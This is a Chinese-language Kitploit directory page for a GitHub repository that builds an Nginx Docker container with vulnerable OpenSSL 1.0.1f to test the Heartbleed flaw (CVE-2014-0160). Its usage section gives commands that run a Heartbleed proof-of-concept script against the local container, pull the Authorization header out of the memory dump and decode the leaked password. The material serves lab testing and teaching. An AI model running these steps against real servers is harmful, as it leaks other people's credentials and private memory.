Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Heartbleed_Dockerfile_with_Nginx — Dockerfile for testing CVE-2014-0160 Heartbleed exploitation. | Kitploit
工具/GitHubGitHub/froyo75/heartbleed_dockerfile_with_nginx
Container SecurityVulnerability AnalysisExploitationWeb SecurityPenetration TestingLearning & Education
GitHubfroyo75/heartbleed_dockerfile_with_nginx

Heartbleed_Dockerfile_with_Nginx

Dockerfile for testing CVE-2014-0160 Heartbleed exploitation.

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
14年前尚未审核

使用 Nginx Dockerfile 测试 Heartbleed

该仓库包含 Nginx 的 Dockerfile,其中使用了存在漏洞的 OpenSSL 版本 (1.0.1f),用于测试 CVE-2014-0160 Heartbleed 漏洞。

基础 Docker 镜像

  • debian:latest

安装

  1. 安装 Docker

    • 以 Debian 为例:apt-get install -y docker
  2. 从公开的 Docker Hub Registry 下载 debian 基础镜像: docker pull debian:latest

  3. 根据 Dockerfile 构建镜像:docker build -t heartbleed_nginx_img .

使用方法

启动 Heartbleed+Nginx 容器

docker run -i -t -p 1500:443 heartbleed_nginx_img

使用 HTTP 基本认证方法测试 Heartbleed 漏洞 (CVE-2014-0160)
  1. 下载 Heartbleed-poc Python 脚本(仅用于测试目的!)。此版本由 Jared Stafford [email protected] 修改而来。 感谢 SensePost 提供此脚本。

  2. 在当前终端中打开两个新标签页并运行以下命令:

    • 第一个标签页(使用 curl 命令通过 HTTP Basic Auth 生成 x100 个 GET 请求):

      for loop in {0..100..1}; do curl -X GET -s -i -k -u admin:myP@ssword0MG https://127.0.0.1:1500| grep -E "200"; done

      HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK HTTP/1.1 200 OK 片段...

    • 第二个标签页(生成 x100 个心跳请求(-n 100),将内存转储写入 "dump.bin" 文件,然后从内存转储中提取 "Authorization" 字段的结果,最后将 Base64 结果字符串解码为明文 ^^):

      python heartbleed-poc.py -f dump.bin -q -n 100 -p 1500 127.0.0.1 && grep -a "^Authorization:" dump.bin | head -n1 | awk -F " " '{print $3}' | tr -d '\n\r' | base64 --decode && echo

      WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! ... received message: type = 22, ver = 0302, length = 66 ... received message: type = 22, ver = 0302, length = 925 ... received message: type = 22, ver = 0302, length = 331 ... received message: type = 22, ver = 0302, length = 4 ... received message: type = 24, ver = 0302, length = 16384 WARNING: server 127.0.0.1 returned more data than it should - server is vulnerable! 片段... admin:myP@ssword0MG

下载工具